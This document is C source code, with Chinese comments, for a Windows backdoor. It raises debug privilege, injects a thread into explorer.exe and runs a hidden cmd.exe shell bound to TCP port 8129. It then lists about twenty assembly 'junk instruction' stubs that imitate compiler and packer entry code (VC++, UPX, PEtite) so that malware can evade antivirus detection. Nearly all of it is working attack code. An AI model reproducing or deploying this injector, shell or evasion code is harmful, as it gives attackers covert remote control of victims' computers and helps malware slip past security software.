#include<winsock2.h>#pragma comment(lib,"ws2_32.lib")#include<windows.h>#include <Shlwapi.h>#pragma comment(lib,"Shlwapi.lib")#include <tlhelp32.h>#include <stdio.h>#include <string.h>
//参数结构 ; typedef struct _RemotePara{ DWORD dwLoadLibrary;DWORD dwFreeLibrary;DWORD dwGetProcAddress;DWORD dwGetModuleHandle;DWORD dwWSAStartup;DWORD dwSocket;DWORD dwhtons;DWORD dwbind;DWORD dwlisten;DWORD dwaccept;DWORD dwsend;DWORD dwrecv;DWORD dwclosesocket;DWORD dwCreateProcessA;DWORD dwPeekNamedPipe;DWORD dwWriteFile;DWORD dwReadFile;DWORD dwCloseHandle;DWORD dwCreatePipe;DWORD dwTerminateProcess;DWORD dwMessageBox;
char strMessageBox[12];char winsockDll[16];char cmd[10];char Buff[4096];char telnetmsg[60];}RemotePara;
// 提升应用级调试权限BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable); // 根据进程名称得到进程IDDWORD GetPidByName(char *szName);
// 远程线程执行体DWORD __stdcall ThreadProc(RemotePara *Para){WSADATA WSAData;WORD nVersion;SOCKET listenSocket;SOCKET clientSocket;
struct sockaddr_in server_addr;struct sockaddr_in client_addr;
int iAddrSize = sizeof(client_addr);
SECURITY_ATTRIBUTES sa;
HANDLE hReadPipe1;HANDLE hWritePipe1;HANDLE hReadPipe2;HANDLE hWritePipe2;
STARTUPINFO si;PROCESS_INFORMATION ProcessInformation;unsigned long lBytesRead = 0;
typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE );typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE);
FARPROC PMessageBoxA;FARPROC PWSAStartup;FARPROC PSocket;FARPROC Phtons;FARPROC Pbind;FARPROC Plisten;FARPROC Paccept;FARPROC Psend;FARPROC Precv;FARPROC Pclosesocket;FARPROC PCreateProcessA;FARPROC PPeekNamedPipe;FARPROC PWriteFile;FARPROC PReadFile;FARPROC PCloseHandle;FARPROC PCreatePipe;FARPROC PTerminateProcess;
PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary;PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para->dwGetProcAddress;PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary;PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para->dwGetModuleHandle;
LoadLibraryFunc(Para->winsockDll);
PWSAStartup = (FARPROC)Para->dwWSAStartup;PSocket = (FARPROC)Para->dwSocket;Phtons = (FARPROC)Para->dwhtons;Pbind = (FARPROC)Para->dwbind;Plisten = (FARPROC)Para->dwlisten;Paccept = (FARPROC)Para->dwaccept;Psend = (FARPROC)Para->dwsend;Precv = (FARPROC)Para->dwrecv;Pclosesocket = (FARPROC)Para->dwclosesocket;PCreateProcessA = (FARPROC)Para->dwCreateProcessA;PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe;PWriteFile = (FARPROC)Para->dwWriteFile;PReadFile = (FARPROC)Para->dwReadFile;PCloseHandle = (FARPROC)Para->dwCloseHandle;PCreatePipe = (FARPROC)Para->dwCreatePipe;PTerminateProcess = (FARPROC)Para->dwTerminateProcess;PMessageBoxA = (FARPROC)Para->dwMessageBox;
nVersion = MAKEWORD(2,1);PWSAStartup(nVersion, (LPWSADATA)&WSAData);listenSocket = PSocket(AF_INET, SOCK_STREAM, 0);if(listenSocket == INVALID_SOCKET)return 0;
server_addr.sin_family = AF_INET;server_addr.sin_port = Phtons((unsigned short)(8129));server_addr.sin_addr.s_addr = INADDR_ANY;
if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0;if(Plisten(listenSocket, 5))return 0;clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize);// Psend(clientSocket, Para->telnetmsg, 60, 0);
if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0;
ZeroMemory(&si,sizeof(si)); //ZeroMemory是C运行库函数,可以直接调用si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;si.wShowWindow = SW_HIDE;si.hStdInput = hReadPipe2;si.hStdOutput = si.hStdError = hWritePipe1;
if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation))return 0;while(1) { memset(Para->Buff,0,4096); PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0); if(lBytesRead) {if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0))break;if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break; }else {lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0);if(lBytesRead <=0 ) break;if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0))break; }}
PCloseHandle(hWritePipe2);PCloseHandle(hReadPipe1);PCloseHandle(hReadPipe2);PCloseHandle(hWritePipe1);Pclosesocket(listenSocket);Pclosesocket(clientSocket);
// PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK);
return 0; }
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow){ const DWORD THREADSIZE=1024*4;DWORD byte_write; void *pRemoteThread;HANDLE hToken,hRemoteProcess,hThread;HINSTANCE hKernel,hUser32,hSock;RemotePara myRemotePara,*pRemotePara; DWORD pID;
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);
// 获得指定进程句柄,并设其权限为PROCESS_ALL_ACCESSpID = GetPidByName("EXPLORER.EXE");if(pID == 0)return 0;hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID); if(!hRemoteProcess)return 0;
// 在远程进程地址空间分配虚拟内存pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);if(!pRemoteThread)return 0;
// 将线程执行体ThreadProc写入远程进程if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, &ThreadProc, THREADSIZE,0))return 0;
ZeroMemory(&myRemotePara,sizeof(RemotePara)); hKernel = LoadLibrary( "kernel32.dll"); myRemotePara.dwLoadLibrary = (DWORD)GetProcAddress(hKernel, "LoadLibraryA"); myRemotePara.dwFreeLibrary = (DWORD)GetProcAddress(hKernel, "FreeLibrary");myRemotePara.dwGetProcAddress = (DWORD)GetProcAddress(hKernel, "GetProcAddress");myRemotePara.dwGetModuleHandle = (DWORD)GetProcAddress(hKernel, "GetModuleHandleA");
myRemotePara.dwCreateProcessA = (DWORD)GetProcAddress(hKernel, "CreateProcessA");myRemotePara.dwPeekNamedPipe = (DWORD)GetProcAddress(hKernel, "PeekNamedPipe");myRemotePara.dwWriteFile = (DWORD)GetProcAddress(hKernel, "WriteFile");myRemotePara.dwReadFile = (DWORD)GetProcAddress(hKernel, "ReadFile");myRemotePara.dwCloseHandle = (DWORD)GetProcAddress(hKernel, "CloseHandle");myRemotePara.dwCreatePipe = (DWORD)GetProcAddress(hKernel, "CreatePipe");myRemotePara.dwTerminateProcess = (DWORD)GetProcAddress(hKernel, "TerminateProcess");
hSock = LoadLibrary("wsock32.dll");myRemotePara.dwWSAStartup = (DWORD)GetProcAddress(hSock,"WSAStartup");myRemotePara.dwSocket = (DWORD)GetProcAddress(hSock,"socket");myRemotePara.dwhtons = (DWORD)GetProcAddress(hSock,"htons");myRemotePara.dwbind = (DWORD)GetProcAddress(hSock,"bind");myRemotePara.dwlisten = (DWORD)GetProcAddress(hSock,"listen");myRemotePara.dwaccept = (DWORD)GetProcAddress(hSock,"accept");myRemotePara.dwrecv = (DWORD)GetProcAddress(hSock,"recv");myRemotePara.dwsend = (DWORD)GetProcAddress(hSock,"send");myRemotePara.dwclosesocket = (DWORD)GetProcAddress(hSock,"closesocket");
hUser32 = LoadLibrary("user32.dll");myRemotePara.dwMessageBox = (DWORD)GetProcAddress(hUser32, "MessageBoxA");
strcat(myRemotePara.strMessageBox,"Sucess!//0"); strcat(myRemotePara.winsockDll,"wsock32.dll//0"); strcat(myRemotePara.cmd,"cmd.exe//0"); strcat(myRemotePara.telnetmsg,"Connect Sucessful!//n//0");
//写进目标进程 pRemotePara =(RemotePara *)VirtualAllocEx (hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);if(!pRemotePara)return 0; if(!WriteProcessMemory (hRemoteProcess ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0;
// 启动线程 hThread = CreateRemoteThread(hRemoteProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write); while(1) {}FreeLibrary(hKernel);FreeLibrary(hSock);FreeLibrary(hUser32);CloseHandle(hRemoteProcess);CloseHandle(hToken);
return 0; }
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid);tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);return((GetLastError() == ERROR_SUCCESS));}
DWORD GetPidByName(char *szName){HANDLE hProcessSnap = INVALID_HANDLE_VALUE;PROCESSENTRY32 pe32={0};DWORD dwRet=0;
hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if(hProcessSnap == INVALID_HANDLE_VALUE)return 0;
pe32.dwSize = sizeof(PROCESSENTRY32);if(Process32First(hProcessSnap, &pe32)){ do {if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0){dwRet=pe32.th32ProcessID;break;} }while (Process32Next(hProcessSnap,&pe32));}else return 0;
if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap);return dwRet;
1.伪装vc++5.0代码:PUSH EBP MOV EBP,ESP PUSH -1 push 415448 -/___PUSH 4021A8 -/ 在这段代码中类似这样的操作数可以乱填 MOV EAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP ADD ESP,-6C PUSH EBX PUSH ESI PUSH EDI ADD BYTE PTR DS:[EAX],AL /这条指令可以不要!jmp 原入口地址
************************************************************************2.胡乱跳转代码:noppush ebpmov ebp,espinc ecxpush edxnoppop edxdec ecxpop ebpinc ecxloop somewhere /跳转到上面那段代码地址去!
somewhere: nop /"胡乱"跳转的开始...jmp 下一个jmp的地址 /在附近随意跳jmp ... /...jmp 原入口地址 /跳到原始oep
90 55 8B EC 41 52 90 5A 49 5D 41
转储免杀
************************************************************************3.伪装c++代码:push ebpmov ebp,esppush -1push 111111push 222222mov eax,fs:[0]push eaxmov fs:[0],esppop eaxmov fs:[0],eaxpop eaxpop eaxpop eaxpop eaxmov ebp,eaxjmp 原入口地址
************************************************************************4.伪装Microsoft Visual C++ 6.0代码:
PUSH -1PUSH 0PUSH 0MOV EAX,DWORD PTR FS:[0]PUSH EAXMOV DWORD PTR FS:[0],ESPSUB ESP,68PUSH EBXPUSH ESIPUSH EDIPOP EAXPOP EAXPOP EAXADD ESP,68POP EAXMOV DWORD PTR FS:[0],EAXPOP EAXPOP EAXPOP EAXPOP EAXMOV EBP,EAXJMP 原入口地址
push ebpmov ebp,espjmp
************************************************************************5.伪装防杀精灵一号防杀代码:push ebpmov ebp,esppush -1push 666666push 888888mov eax,dword ptr fs:[0]push eaxmov dword ptr fs:[0],esppop eaxmov dword ptr fs:[0],eaxpop eaxpop eaxpop eaxpop eaxmov ebp,eaxjmp 原入口地址
************************************************************************6.伪装防杀精灵二号防杀代码:push ebpmov ebp,esppush -1push 0push 0mov eax,dword ptr fs:[0]push eaxmov dword ptr fs:[0],espsub esp,68push ebxpush esipush edipop eaxpop eaxpop eaxadd esp,68pop eaxmov dword ptr fs:[0],eaxpop eaxpop eaxpop eaxpop eaxmov ebp,eaxjmp 原入口地址
************************************************************************7.伪装木马彩衣(无限复活袍)代码:PUSH EBP MOV EBP,ESP PUSH -1 push 415448 -/___PUSH 4021A8 -/ 在这段代码中类似这样的操作数可以乱填 MOV EAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP ADD ESP,-6C PUSH EBX PUSH ESI PUSH EDI ADD BYTE PTR DS:[EAX],AL /这条指令可以不要!jo 原入口地址jno 原入口地址call 下一地址
************************************************************************8.伪装木马彩衣(虾米披风)代码:push ebpnopnopmov ebp,espinc ecxnoppush edxnopnoppop edxnoppop ebpinc ecxloop somewhere /跳转到下面那段代码地址去!
someshere:nop /"胡乱"跳转的开始...jmp 下一个jmp的地址 /在附近随意跳jmp ... /...jmp 原入口的地址 /跳到原始oep
9.伪装花花添加器(神话)代码:-----------根据C++改nopnopnopmov ebp,esppush -1push 111111push 222222mov eax,dword ptr fs:[0]push eaxmov dword ptr fs:[0],esppop eaxmov dword ptr fs:[0],eaxpop eaxpop eaxpop eaxpop eaxmov ebp,eaxmov eax,原入口地址push eaxretn
************************************************************************10.伪装花花添加器(无极)代码:nopmov ebp, esppush -1push 0A2C2Apush 0D9038mov eax, fs:[0]push eaxmov fs:[0], esppop eaxmov fs:[0], eaxpop eaxpop eaxpop eaxpop eaxmov ebp, eaxmov eax, 原入口地址jmp eax
************************************************************************11.伪装花花添加器(金刚)代码:--------根据VC++5.0改nopnopmov ebp, esppush -1push 415448push 4021A8 mov eax, fs:[0]push eaxmov fs:[0], espadd esp, -6Cpush ebxpush esipush ediadd [eax], almov eax,原入口地址jmp eax
************************************************************************12.伪装花花添加器(杀破浪)代码:nopmov ebp, esppush -1push 0push 0mov eax, fs:[0]push eaxmov fs:[0], espsub esp, 68push ebxpush esipush edipop eaxpop eaxpop eaxadd esp, 68pop eaxmov fs:[0], eaxpop eaxpop eaxpop eaxpop eaxmov ebp, eaxmov eax, 原入口地址jmp eax
************************************************************************12.伪装花花添加器(痴情大圣)代码:nop..........省略N行nopnoppush ebpmov ebp, espadd esp, -0Cadd esp, 0Cmov eax, 原入口地址push eaxretn
************************************************************************13.伪装花花添加器(如果*爱)代码:nop........省略N行nopnoppush ebpmov ebp, espinc ecxpush edxnoppop edxdec ecxpop ebpinc ecxmov eax, 原入口地址jmp eax
************************************************************************14.伪装PEtite 2.2 -> Ian Luck代码:mov eax,0040E000push 004153F3push dword ptr fs:[0]mov dword ptr fs:[0],esppushfwpushadpush eaxxor ebx,ebxpop eaxpopadpopfwpop dword ptr fs:[0]pop eaxjmp 原入口地址 '执行到程序的原有OEP
************************************************************************15.无效PE文件代码:push ebp mov ebp,espinc ecxpush edxnoppop edxdec ecxpop ebpinc ecxMOV DWORD PTR FS:[0],EAX /POP EAX | POP EAX /MOV DWORD PTR FS:[0],EAX |(注意了。。花指令)POP EAX / POP EAX |MOV DWORD PTR FS:[0],EAX /loop 原入口地址
************************************************************************16.伪装防杀精灵终极防杀代码:push ebpmov ebp,espadd esp,-0Cadd esp,0Cpush eaxjmp 原入口地址
************************************************************************17.伪装木马彩衣(金色鱼锦衣)花代码push ebpmov ebp,espadd esp,-0Cadd esp,0Cmov eax,原入口地址push eaxretn
************************************************************************18.在mov ebp,eax后面加上PUSH EAX POP EAX
************************************************************************19.伪装UPX花指令代码:
pushadmov esi,m.0044D000lea edi,dword ptr ds:[esi+FFFB4000]push edior ebp,FFFFFFFFjmp short m.00477F2A
************************************************************************20.push ebp mov ebp,esp inc ecx push edx pop edx dec ecx pop ebp inc ecx jmp 原入口
************************************************************************
